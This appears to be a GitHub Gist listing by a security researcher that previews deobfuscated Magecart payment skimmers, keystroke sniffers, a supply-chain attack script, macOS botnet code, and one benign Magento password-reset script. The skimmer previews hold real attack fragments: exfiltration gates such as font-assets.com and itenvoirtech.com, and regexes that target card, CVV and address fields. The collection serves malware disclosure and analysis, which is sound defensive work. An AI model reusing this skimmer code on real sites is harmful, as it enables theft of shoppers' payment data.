gwillem
/ decoded.js
Last active
April 28, 2022 06:32
962 stores found breached on the 4th of July - https://sansec.io
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Decoded by Sanguine Security <info@sansec.io> | |
| String.prototype.hexEncode = function() { | |
| var a, b; | |
| var output = ''; | |
| for (b = 0; b < this.length; b++) { | |
| a = this.charCodeAt(b).toString(16); | |
| output += ('000' + a).slice(-4) | |
| }; | |
| return output | |
| }; |
gwillem
/ keystroke_sniffer_1.js
Last active
March 2, 2022 17:32
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var sniffData = {}; | |
| sniffData['Gate'] = 'https://font-assets.com/img'; | |
| sniffData['Data'] = {}; | |
| sniffData['Sent'] = []; | |
| sniffData.IsValid = ![]; | |
| sniffData.SaveParam = function(field) { | |
| if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) { | |
| if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![]; | |
| sniffData.Data[field.id] = field.value; | |
| return; |
gwillem
/ original.js
Created
May 12, 2019 16:43
www.Picreel.com supply chain attack 2019-05-11 @ https://assets.pcrl.co/js/jstracker.min.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no |
gwillem
/ main.py
Last active
April 23, 2019 11:29
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import pwd | |
| import random | |
| import string | |
| import urllib, urllib2 | |
| import json | |
| import time | |
| import sys | |
| import base64 | |
| import random |
gwillem
/ enforce-passwd-change.sh
Created
March 4, 2019 09:42
Enforce new passwords for all Magento1 staff users
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Requires n98-magerun | |
| n98-magerun admin:user:list --format=csv | grep ,active | while read row; | |
| do | |
| user=$(echo $row | cut -d, -f2) | |
| pass=$(tr -cd '[:alnum:]' < /dev/urandom | fold -w10 | head -n1) | |
| echo "$user -> $pass" | |
| n98-magerun admin:user:change-password $user $pass >/dev/null | |
| done |
gwillem
/ onlineclouds.cloud_conversion_async_unfuscated.js
Created
November 19, 2018 14:25
Malware from onlineclouds.cloud unfuscated
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setTimeout(checkForCheckout, 100); | |
| var snd = null; | |
| function checkForCheckout() { | |
| if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) { | |
| scrapeAllFields(); | |
| } | |
| } | |
| function createQueryString() { |
gwillem
/ secure.livechatinc.org.js
Created
November 19, 2018 11:28
Deobfuscated version of MyPillow.com hack: https://twitter.com/BreachMessenger/status/1064456927919267840
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Base64; | |
| function setSavedAddr() { | |
| var B0f; | |
| B0f = jQuery(`select[name=' billing_address_id '] :selected`).text(); | |
| } | |
| function encryptData(n0f, k0f) { | |
| var y0f, h8V, m8V, x8V; |
gwillem
/ infowarstores.com.js
Created
November 13, 2018 18:35
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var idString = "id", | |
| nameString = "name", | |
| tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"), | |
| zoneRegionStateCountry = new RegExp("zone|region|state|country"), | |
| formObj = {}, | |
| formLength = 0, | |
| emptyString = "", | |
| devToolsStatus = { | |
| open: !1, | |
| orientation: null |
gwillem
/ techrabbit.com.js
Last active
March 2, 2022 17:33
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://'; | |
| var hostname = window.location.host; | |
| var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country'; | |
| var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}'; | |
| var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email'; | |
| var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button'; | |
| var emptyString = ''; | |
| var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder'; | |
| var emptyList = []; | |
| var dropServers = ['itenvoirtech.com']; |